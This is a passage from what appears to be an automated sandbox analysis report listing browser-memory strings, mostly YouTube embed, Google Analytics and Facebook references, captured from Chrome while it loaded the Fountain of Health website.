ddedPlayerFlags\\\":{}},\\\"embeddedPlayerContext\\\":{\\\"embeddedPlayerEncryptedContext\\\":\\\"AD5ZzFRO_8nQGG9ORNDSzmkPn-Uo_VeiVfjiwPlQ8ibCpbKGSMTxwT1uceJbejPXkPtxSS6fZPYoJMw_71fzot0Mx1OJrOf2f68RDWLaooVr3MmGoIQB53hXn4k_0fSZd_Yd\\\",\\\"ancestorOriginsSupported\\\":false}}\",\"video_id\":\"gobWGqPjLSQ\"},\"POST_MESSAGE_ORIGIN\":\"*\",\"VIDEO_ID\":\"gobWGqPjLSQ\",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":false}_ = [];","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":false}RIGIN\":\"*\",\"VIDEO_ID\":\"h15NcT6UXh0\",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2323240565.000028EC04C71000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2323781309.000028EC048E9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: anaeEO6+YHG0Rivn/TyM2kI3G7ei4OTvyCRpx+0DXUMA93MJE52kq3k2+ma1U+iTAFC7QJjvH4iLFgXjUHCjE7FBjgyAq/UkkSZsO2fRZ1l2ok5PgkPoYSA/2u346iT//+Yo85JMu26FLhPczPtyFfsVmJKr0gUX9N9F46dWGmXRqgdtHBcT7a4R2SFOKmdAFAOtzCyKPI8oynurTOlccYXros9Tpm4mUVwrpeNa+vRM620o7ob45SQuIAd5kIlH7wvM1rN9lIotDWffHs6zJUrRcYXS3/Xn+QLEg2eTmpeBsthdz+nO0LYo/6W92GsMqbMqUmH9zNrAofNze0j3oYHmllEUcIbliJP2PP9+ywhZU1KjCwppRleCyBrg2hst2eV1sjEQ6cTayJeuTSpg7wlP6COfy2kJ4ZBIAZAkJ/bDiY2KQdFqh/eTD4w9mzMdHC8oBFmE6jyBU5vDlbjqakfe25xnZ8jnC7Qx0h5OQqbw3idhDbX4YlfrmtbtsYBUj5TRf+2rl1SePWUsccX8QNNfDRJ137WM/bxLg163DKv0jDCug/dUe1nzqeAtSezwlgLsc25iBsbJYm5208SkJsCnx5OWoAU2cy2yOi+iBDZ7rCz2H8bQMyKekGqPC5LeVyskel6l1Glhyst4DttMieJJVPVbZNBunD6wNG0eFToQ9FnP4LQ8r6jtAtBNtadLO7ePHbQgdfwZ8oUNtCTB4gnm57xIH3yEPXtflU9spoGv/xfFGgcSWe20VJ1r2jB2nZprzGKeiLg8CWDZqTQlR+kq2UROhydkeL5omaHwNnY2KuvyU/h62tNKBwAuxOED7r2e3qQso3XJNnxqQDTNZ//j71sGx4rIpd11VQKMl/r3IuYL26zynFAEVOoXXb9GI1FEI6+GUS+hRwn84JQaP8vL3eEx4k2xeulRba/gXZF3znpeR22I60k2jV/NZrSTWmOiewUGzX5Ur/EqnRVQoS0xKFdAAlkALOuBzNA/s90DN6aaECp6dmEAKlYj9/dsv3iLKRqoJXVmTAwfONRkqODMe1A9B0M\\u003d\\\",\\\"interpreterSafeUrl\\\":{\\\"privateDoNotAccessOrElseTrustedResourceUrlWrappedValue\\\":\\\"//www.google.com/js/th/v15QCjm6WO3QEs80chG8QfS1HlFrDoWBLlSvxspkiuA.js\\\"},\\\"serverEnvironment\\\":1}}},\\\"videoFlags\\\":{\\\"playableInEmbed\\\":true,\\\"isCrawlable\\\":true},\\\"previewPlayabilityStatus\\\":{\\\"status\\\":\\\"OK\\\",\\\"playableInEmbed\\\":true,\\\"contextParams\\\":\\\"Q0FJU0FnZ0E\\u003d\\\"},\\\"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerConfig\\\":{\\\"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerFlags\\\":{}},\\\"embeddedPlayerContext\\\":{\\\"embeddedPlayerEncryptedContext\\\":\\\"AD5ZzFRO_8nQGG9ORNDSzmkPn-Uo_VeiVfjiwPlQ8ibCpbKGSMTxwT1uceJbejPXkPtxSS6fZPYoJMw_71fzot0Mx1OJrOf2f68RDWLaooVr3MmGoIQB53hXn4k_0fSZd_Yd\\\",\\\"ancestorOriginsSupported\\\":false}}\",\"video_id\":\"gobWGqPjLSQ\"},\"POST_MESSAGE_ORIGIN\":\"*\",\"VIDEO_ID\":\"gobWGqPjLSQ\",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":true} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2323240565.000028EC04C71000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: anaeEO6+YHG0Rivn/TyM2kI3G7ei4OTvyCRpx+0DXUMA93MJE52kq3k2+ma1U+iTAFC7QJjvH4iLFgXjUHCjE7FBjgyAq/UkkSZsO2fRZ1l2ok5PgkPoYSA/2u346iT//+Yo85JMu26FLhPczPtyFfsVmJKr0gUX9N9F46dWGmXRqgdtHBcT7a4R2SFOKmdAFAOtzCyKPI8oynurTOlccYXros9Tpm4mUVwrpeNa+vRM620o7ob45SQuIAd5kIlH7wvM1rN9lIotDWffHs6zJUrRcYXS3/Xn+QLEg2eTmpeBsthdz+nO0LYo/6W92GsMqbMqUmH9zNrAofNze0j3oYHmllEUcIbliJP2PP9+ywhZU1KjCwppRleCyBrg2hst2eV1sjEQ6cTayJeuTSpg7wlP6COfy2kJ4ZBIAZAkJ/bDiY2KQdFqh/eTD4w9mzMdHC8oBFmE6jyBU5vDlbjqakfe25xnZ8jnC7Qx0h5OQqbw3idhDbX4YlfrmtbtsYBUj5TRf+2rl1SePWUsccX8QNNfDRJ137WM/bxLg163DKv0jDCug/dUe1nzqeAtSezwlgLsc25iBsbJYm5208SkJsCnx5OWoAU2cy2yOi+iBDZ7rCz2H8bQMyKekGqPC5LeVyskel6l1Glhyst4DttMieJJVPVbZNBunD6wNG0eFToQ9FnP4LQ8r6jtAtBNtadLO7ePHbQgdfwZ8oUNtCTB4gnm57xIH3yEPXtflU9spoGv/xfFGgcSWe20VJ1r2jB2nZprzGKeiLg8CWDZqTQlR+kq2UROhydkeL5omaHwNnY2KuvyU/h62tNKBwAuxOED7r2e3qQso3XJNnxqQDTNZ//j71sGx4rIpd11VQKMl/r3IuYL26zynFAEVOoXXb9GI1FEI6+GUS+hRwn84JQaP8vL3eEx4k2xeulRba/gXZF3znpeR22I60k2jV/NZrSTWmOiewUGzX5Ur/EqnRVQoS0xKFdAAlkALOuBzNA/s90DN6aaECp6dmEAKlYj9/dsv3iLKRqoJXVmTAwfONRkqODMe1A9B0M\\u003d\\\",\\\"interpreterSafeUrl\\\":{\\\"privateDoNotAccessOrElseTrustedResourceUrlWrappedValue\\\":\\\"//www.google.com/js/th/v15QCjm6WO3QEs80chG8QfS1HlFrDoWBLlSvxspkiuA.js\\\"},\\\"serverEnvironment\\\":1}}},\\\"videoFlags\\\":{\\\"playableInEmbed\\\":true,\\\"isCrawlable\\\":true},\\\"previewPlayabilityStatus\\\":{\\\"status\\\":\\\"OK\\\",\\\"playableInEmbed\\\":true,\\\"contextParams\\\":\\\"Q0FJU0FnZ0E\\u003d\\\"},\\\"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerConfig\\\":{\\\"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerFlags\\\":{}},\\\"embeddedPlayerContext\\\":{\\\"embeddedPlayerEncryptedContext\\\":\\\"AD5ZzFRO_8nQGG9ORNDSzmkPn-Uo_VeiVfjiwPlQ8ibCpbKGSMTxwT1uceJbejPXkPtxSS6fZPYoJMw_71fzot0Mx1OJrOf2f68RDWLaooVr3MmGoIQB53hXn4k_0fSZd_Yd\\\",\\\"ancestorOriginsSupported\\\":false}}\",\"video_id\":\"gobWGqPjLSQ\"},\"POST_MESSAGE_ORIGIN\":\"*\",\"VIDEO_ID\":\"gobWGqPjLSQ\",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":true}_ = [];","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":true}e":true,"dynamic":true} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2313814600.000028EC04404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313605417.000028EC03ABE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: c?"runIfCanceled":"runIfUncanceled",[]);if(!g.length)return!0;var h=tF(a,c,e);O(121);if(h["gtm.elementUrl"]==="https://www.facebook.com/tr/")return O(122),!0;if(d&&f){for(var m=Db(b,g.length),n=0;n<g.length;++n)g[n](h,m);return m.done}for(var p=0;p<g.length;++p)g[p](h,function(){});return!0},wF=function(){var a=[],b=function(c){return hb(a,function(d){return d.form===c})};return{store:function(c,d){var e=b(c);e?e.button=d:a.push({form:c,button:d})},get:function(c){var d=b(c);return d?d.button:null}}}, equals www.facebook.com (Facebook)
Source: chrome.exe, 00000000.00000002.2491036779.000028EC0402C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: cawww.youtube.com_default equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2470610056.000028EC02614000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: cawww.youtube.com_default+ equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2470610056.000028EC02614000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: cawww.youtube.com_default+/ equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2331553095.000028EC08604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331869363.000028EC05804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331543436.000028EC08204000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: cs.prototype.logTrace=function(B){this.encoder.reset();this.encoder.add(1);this.encoder.add(B.resources.length);for(var z=g.d(B.resources),T=z.next();!T.done;T=z.next()){T=T.value.replace("https://www.youtube.com/s/","");this.encoder.add(T.length);for(var R=0;R<T.length;R++)this.encoder.add(T.charCodeAt(R))}this.encoder.add(B.frames.length);z=g.d(B.frames);for(T=z.next();!T.done;T=z.next()){T=T.value;this.encoder.add(T.name.length);for(R=0;R<T.name.length;R++)this.encoder.add(T.name.charCodeAt(R)); equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2477907567.000028EC03017000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: d.visibilityState||d.webkitVisibilityState)==\"hidden\";if(isHidden)ytcsi.tick(\"vc\")}var slt=function(el,t){setTimeout(function(){var n=ytcsi.now();el.loadTime=n;if(el.slt)el.slt()},t)};w.__ytRIL=function(el){if(!el.getAttribute(\"data-thumb\"))if(w.requestAnimationFrame)w.requestAnimationFrame(function(){slt(el,0)});else slt(el,16)}})(window,document);\n","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2442196186.000001E4AF687000.00000004.08000000.00040000.00000007.sdmp String found in binary or memory: e=values[key];if(value)parts.push(key+\"=\"+encodeURIComponent(value))}img.src=parts.join(\"&\")};\n","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2442196186.000001E4AF687000.00000004.08000000.00040000.00000007.sdmp String found in binary or memory: e=values[key];if(value)parts.push(key+\"=\"+encodeURIComponent(value))}img.src=parts.join(\"&\")};\n","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2487214642.000028EC03B30000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: eIdx 1AE355D2DCEC0EB3AE0A8EFA72B8E40Fcurlx=https://www.youtube.com/embed/h15NcT6UXh0?si= equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2487214642.000028EC03B30000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: eIdx 1AE355D2DCEC0EB3AE0A8EFA72B8E40Fcurlx=https://www.youtube.com/embed/h15NcT6UXh0?si=rXkudamggTRA5D8 equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2344822174.000028EC047E8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: eIdx 532A55714A7F9A8B174636802271CCE9curlx=https://www.youtube.com/embed/gobWGqPjLSQ?si= equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2344822174.000028EC047E8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: eIdx 532A55714A7F9A8B174636802271CCE9curlx=https://www.youtube.com/embed/gobWGqPjLSQ?si=-htCYBtW0ws255C equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2497731752.000028EC04DF8000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: eIdx B189C27F7A1CB75D4FFD53A8A2E6E020curlx=https://www.youtube.com/embed/FURi5aHgp1g?si= equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2497731752.000028EC04DF8000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: eIdx B189C27F7A1CB75D4FFD53A8A2E6E020curlx=https://www.youtube.com/embed/FURi5aHgp1g?si=2rCuE23kHaXA492 equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2490083566.000028EC03F2C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: eIdx C217A1CD521E4119F7A36EFDF877B4D1curlx=https://www.youtube.com/embed/FURi5aHgp1g?si= equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2490083566.000028EC03F2C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: eIdx C217A1CD521E4119F7A36EFDF877B4D1curlx=https://www.youtube.com/embed/FURi5aHgp1g?si=2rCuE23kHaX4E8A equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2314698479.000028EC03F04000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: eIdx CFFCDE4C3FD32DE3CFDAAB2551ACA955curlx=https://www.youtube.com/embed/h15NcT6UXh0?si= equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2314698479.000028EC03F04000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: eIdx CFFCDE4C3FD32DE3CFDAAB2551ACA955curlx=https://www.youtube.com/embed/h15NcT6UXh0?si=rXkudamggTRB6DF equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2329891050.000028EC04A68000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 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
Source: chrome.exe, 00000000.00000002.2442196186.000001E4AF687000.00000004.08000000.00040000.00000007.sdmp String found in binary or memory: event?alt=jsonrentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2485632326.000028EC0380C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2489810514.000028EC03EC4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.1816103375.000028EC0336C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: f/embedfdomainowww.youtube.com equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2489810514.000028EC03EC4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.1816103375.000028EC0336C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: fcoof/embedfdomainowww.youtube.com equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2331272566.000028EC0578B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: g.I.getVideoUrl=function(B,z,T,R,h,W,b){z={list:z};T&&(h?z.time_continue=T:z.t=T);T=b?"music.youtube.com":g.Of(this);h=T==="www.youtube.com";!W&&R&&h?W="https://youtu.be/"+B:g.vo(this)?(W="https://"+T+"/fire",z.v=B):(W&&h?(W=this.protocol+"://"+T+"/shorts/"+B,R&&(z.feature="share")):(W=this.protocol+"://"+T+"/watch",z.v=B),XJ&&(B=fc5())&&(z.ebc=B));return g.Qn(W,z)}; equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2331101993.000028EC05434000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: g.I.y$u=function(){switch(this.Y.getStatus()){case 1:$c(this,"readable");break;case 5:case 6:case 4:case 7:case 3:$c(this,"error");break;case 8:$c(this,"close");break;case 2:$c(this,"end")}};e6B.prototype.serverStreaming=function(B,z,T,R){var h=this,W=B.substring(0,B.length-R.name.length);return htK(function(b){var l=b.q3,w=b.getMetadata(),q=BWz(h,!1);w=ztd(h,w,q,W+l.getName());var c=TWr(q,l.U,!0);b=l.T(b.nj);q.send(w,"POST",b);return c},this.XR).call(this,R.L(z,T))};WWX.prototype.create=function(B,z){return H45(this.T,this.U+"/$rpc/google.internal.waa.v1.Waa/Create",B,z||{},vPq)};var bhz="://secure-...imrworldwide.com/ ://cdn.imrworldwide.com/ ://aksecure.imrworldwide.com/ ://[^.]*.moatads.com ://youtube[0-9]+.moatpixel.com ://pm.adsafeprotected.com/youtube ://pm.test-adsafeprotected.com/youtube ://e[0-9]+.yt.srs.doubleverify.com www.google.com/pagead/xsul www.youtube.com/pagead/slav".split(" "),YnY=/\bocr\b/;var w0P=/(?:\[|%5B)([a-zA-Z0-9_]+)(?:\]|%5D)/g;Object.assign({},{attributes:{},handleError:function(B){throw B;}},{QTE:!0, equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2331553095.000028EC08604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331869363.000028EC05804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331543436.000028EC08204000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: g.Of=function(B){B=mR(B.yW);return B==="www.youtube-nocookie.com"?"www.youtube.com":B}; equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2331553095.000028EC08604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331869363.000028EC05804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331543436.000028EC08204000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: g.Ti=function(B){var z=g.Of(B);MZz.includes(z)&&(z="www.youtube.com");return B.protocol+"://"+z}; equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2439355514.000001E4ACC00000.00000004.00000001.00040000.00000007.sdmp String found in binary or memory: http://localhost:64111/browse>6https://www.youtube.com/youtubei/v1/log_event?alt=jsonscriptSource equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2439355514.000001E4ACC00000.00000004.00000001.00040000.00000007.sdmp String found in binary or memory: http://localhost:64111/tabstatus//www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2488595121.000028EC03D04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2504302862.000028EC078A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/FOHThrive equals www.facebook.com (Facebook)
Source: chrome.exe, 00000000.00000002.2487287792.000028EC03B44000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.google-analytics.com/g/collect?v=2&tid=G-WF39Z4TEVT&gtm=45je55k1v9134219030za200&_p=1747926388605&gcd=13l3l3l3l1l1&npa=0&dma=0&tag_exp=101509157~103116026~103130495~103130497~103136993~103136995~103200004~103233427~103252644~103252646~103301114~103301116~104506547&gdid=dMDhkMT&cid=1981881509.1747926276&ul=en-us&sr=1280x1024&uaa=x86&uab=64&uafvl=Chromium%3B134.0.6998.36%7CNot%253AA-Brand%3B24.0.0.0%7CGoogle%2520Chrome%3B134.0.6998.36&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&are=1&frm=0&pscdl=noapi&_eu=AEAAAAQ&_s=2&sid=1747926276&sct=1&seg=1&dl=https%3A%2F%2Ffountainofhealth.ca%2Fen&dt=Home%20%7C%20Fountain%20of%20Health&en=scroll&ep.page_placeholder=PLACEHOLDER_page_location&epn.percent_scrolled=90&_et=5&tfd=6282ow,document);\n","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2469640808.000028EC02488000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2348376359.000028EC05189000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2341068096.000028EC06B20000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2499837074.000028EC06424000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2499890214.000028EC06438000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2362150726.000028EC05374000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2474881324.000028EC02C04000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/: equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2483628964.000028EC03604000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2483278146.000028EC035BC000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2481401055.000028EC0337C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2488595121.000028EC03D04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2487618019.000028EC03BAC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/@fountainofhealth2679 equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2474881324.000028EC02C04000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/J equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2501591890.000028EC06B12000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2484400894.000028EC036F9000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/^0https://fountainofhealth.ca_default equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2484400894.000028EC036F9000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/^0https://fountainofhealth.cawww.youtube.com_default equals www.youtube.com (Youtube)
